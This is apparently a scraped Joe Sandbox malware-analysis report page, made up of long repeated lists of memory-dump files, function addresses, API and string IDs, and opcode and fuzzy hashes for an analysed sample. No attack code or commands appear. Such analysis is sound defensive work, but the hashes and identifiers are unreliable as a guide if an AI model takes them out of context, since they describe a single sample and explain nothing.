                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246717295.00000000004CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246740921.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246758025.00000000004D3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246777646.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246800494.00000000004DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246817975.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246830145.00000000004E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246844988.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246856860.00000000004EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246868633.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246879270.00000000004F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246889724.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246904342.00000000004F3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247007513.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247050358.0000000000512000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247336648.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248037647.000000000051D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000051E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000053B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249336954.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249401509.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249671405.000000000056F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250058723.0000000000571000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250098533.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250134047.0000000000580000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_260000_file.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _xtime_get$Xtime_diff_to_millis2
                                                                                                                                                                                                                                          • String ID: c13L
                                                                                                                                                                                                                                          • API String ID: 2858396081-2793365725
                                                                                                                                                                                                                                          • Opcode ID: e4681eee8524e2931665910d1af934c585755f9fd3872001b07259e2d2e24bcb
                                                                                                                                                                                                                                          • Instruction ID: 61121edc8f2da66779150328779c7eb360d8aada269d33575c92fa45542bf371
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e4681eee8524e2931665910d1af934c585755f9fd3872001b07259e2d2e24bcb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 70516971A20216CBCF20DF34C5D59AA77A4EF04710B74C55EE80AAB255DB31FD50CBA5
                                                                                                                                                                                                                                          Function 002632D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 142COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2246085921.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246049309.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246085921.00000000002C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246156943.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246171958.00000000002CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246187307.00000000002D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246280736.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246296195.0000000000433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246315142.000000000044C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246329526.000000000044E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246342884.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246342884.0000000000459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246375725.000000000045D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246391924.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246407529.0000000000461000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246420883.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246435523.000000000046B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246450285.0000000000472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246467590.0000000000484000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246481169.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246496664.0000000000486000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246521083.0000000000487000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246574589.0000000000493000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246670011.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246687981.00000000004B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246700751.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246717295.00000000004CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246740921.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246758025.00000000004D3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246777646.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246800494.00000000004DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246817975.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246830145.00000000004E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246844988.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246856860.00000000004EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246868633.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246879270.00000000004F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246889724.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246904342.00000000004F3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247007513.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247050358.0000000000512000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247336648.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248037647.000000000051D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000051E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000053B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249336954.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249401509.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249671405.000000000056F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250058723.0000000000571000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250098533.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250134047.0000000000580000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_260000_file.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Mtx_unlock$Cnd_broadcast
                                                                                                                                                                                                                                          • String ID: c13L
                                                                                                                                                                                                                                          • API String ID: 32384418-2793365725
                                                                                                                                                                                                                                          • Opcode ID: 6c303b55c9986fa3d1aca1ac45b629cb296ec440225753f18e8e6f68b45c006b
                                                                                                                                                                                                                                          • Instruction ID: c0f48c61e242c5bbd64dcf8d68a6d22157e0603e1453f708398a4cbf38b9c476
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6c303b55c9986fa3d1aca1ac45b629cb296ec440225753f18e8e6f68b45c006b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B3415771E14604EBDB20DF699D05B9BF7ECEF55720F10816EE809A3741EB709A24CAE1
                                                                                                                                                                                                                                          Function 002771D0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 236COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • __Mtx_init_in_situ.LIBCPMT ref: 002773FC
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2246085921.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246049309.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246085921.00000000002C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246156943.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246171958.00000000002CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246187307.00000000002D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246280736.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246296195.0000000000433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246315142.000000000044C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246329526.000000000044E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246342884.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246342884.0000000000459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246375725.000000000045D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246391924.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246407529.0000000000461000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246420883.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246435523.000000000046B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246450285.0000000000472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246467590.0000000000484000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246481169.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246496664.0000000000486000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246521083.0000000000487000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246574589.0000000000493000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246670011.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246687981.00000000004B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246700751.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246717295.00000000004CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246740921.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246758025.00000000004D3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246777646.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246800494.00000000004DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246817975.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246830145.00000000004E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246844988.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246856860.00000000004EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246868633.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246879270.00000000004F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246889724.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246904342.00000000004F3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247007513.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247050358.0000000000512000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247336648.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248037647.000000000051D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000051E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000053B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249336954.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249401509.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249671405.000000000056F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250058723.0000000000571000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250098533.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250134047.0000000000580000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_260000_file.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Mtx_init_in_situ
                                                                                                                                                                                                                                          • String ID: 0{'$c13L
                                                                                                                                                                                                                                          • API String ID: 3366076730-2807237454
                                                                                                                                                                                                                                          • Opcode ID: ca51a9cf862df357a1ca2d67f07a4dd62bd072d823632d9b8cbf157c781a0a67
                                                                                                                                                                                                                                          • Instruction ID: f56b0e39da8db81bccdcaa0f3a71b5863c072ad858a4baf0931a18a9c139abd8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ca51a9cf862df357a1ca2d67f07a4dd62bd072d823632d9b8cbf157c781a0a67
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 63A135B0A116158FDB21CF68C984B9EBBF1FF48700F188199E819AB352EB759D11CF80
                                                                                                                                                                                                                                          Function 002626B0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 207COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ___std_exception_copy.LIBVCRUNTIME ref: 00262846
                                                                                                                                                                                                                                          • ___std_exception_destroy.LIBVCRUNTIME ref: 002628E0
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2246085921.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246049309.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246085921.00000000002C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246156943.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246171958.00000000002CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246187307.00000000002D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246280736.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246296195.0000000000433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246315142.000000000044C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246329526.000000000044E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246342884.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246342884.0000000000459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246375725.000000000045D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246391924.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246407529.0000000000461000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246420883.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246435523.000000000046B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246450285.0000000000472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246467590.0000000000484000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246481169.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246496664.0000000000486000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246521083.0000000000487000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246574589.0000000000493000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246670011.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246687981.00000000004B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246700751.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246717295.00000000004CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246740921.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246758025.00000000004D3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246777646.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246800494.00000000004DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246817975.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246830145.00000000004E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246844988.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246856860.00000000004EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246868633.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246879270.00000000004F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246889724.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246904342.00000000004F3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247007513.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247050358.0000000000512000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247336648.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248037647.000000000051D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000051E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000053B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249336954.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249401509.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249671405.000000000056F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250058723.0000000000571000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250098533.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250134047.0000000000580000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_260000_file.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ___std_exception_copy___std_exception_destroy
                                                                                                                                                                                                                                          • String ID: c13L
                                                                                                                                                                                                                                          • API String ID: 2970364248-2793365725
                                                                                                                                                                                                                                          • Opcode ID: 4db339cc99d41a48bae514bb8fa76ec1706936f9d830fc036ae46379cae9f94c
                                                                                                                                                                                                                                          • Instruction ID: 8f8f2e9054470bfb209b7dea2cfb32c2f9173d2e0ca92f18947b57d9d84fa2ab
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4db339cc99d41a48bae514bb8fa76ec1706936f9d830fc036ae46379cae9f94c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B1718171E10248DBDB05CFA8C885BDEFBB9FF59310F14811EE809A7241DB74A994CBA5
                                                                                                                                                                                                                                          Function 0026DBE0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 189COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2246085921.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246049309.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246085921.00000000002C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246156943.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246171958.00000000002CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246187307.00000000002D7000.00000080.00000001.01000000.00000003.sdmpDownload File
